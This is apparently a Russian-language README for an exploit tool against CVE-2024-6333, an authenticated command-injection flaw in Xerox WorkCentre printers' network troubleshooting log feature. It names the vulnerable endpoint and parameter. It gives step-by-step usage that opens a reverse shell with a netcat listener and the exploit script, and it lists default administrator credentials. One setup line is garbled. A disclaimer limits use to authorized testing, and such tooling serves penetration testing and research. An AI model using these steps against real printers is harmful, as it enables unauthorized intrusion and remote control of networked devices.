
Уязвимость аутентифицированного удалённого выполнения кода в принтерах Xerox WorkCentre через функцию журнала устранения неполадок сети.
Аутентифицированное удалённое выполнение кода в принтерах Xerox WorkCentre через функцию журнала сетевой диагностики.
Функция журнала сетевой диагностики (/properties/security/network_troubleshooting_log.php) не очищает параметр сервера назначения (security.nwtroubleshoot.destination.server), что позволяет аутентифицированному администратору внедрять произвольные команды ОС. При запуске захвата сетевого журнала внедрённая полезная нагрузка выполняется как shell-команда, что приводит к удалённому выполнению кода.
073.110.019.14200)pip install -r requirements.txt
Запустите слушатель на вашей машине:
nc -lvnp 8443
Запустите эксплойт:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным.
| Аргумент | Обязательный | По умолчанию | Описание |
|---|
--target | Да | Целевой URL (например, https://192.0.2.1) | |
--lhost | Да | IP-адрес слушателя | |
--lport | Нет | 8443 | Порт слушателя |
--user | Нет | admin | Имя пользователя администратора |
--password | Нет | 1111 | Пароль администратора |
--proxy | Нет | URL прокси (например, http://127.0.0.1:8080) |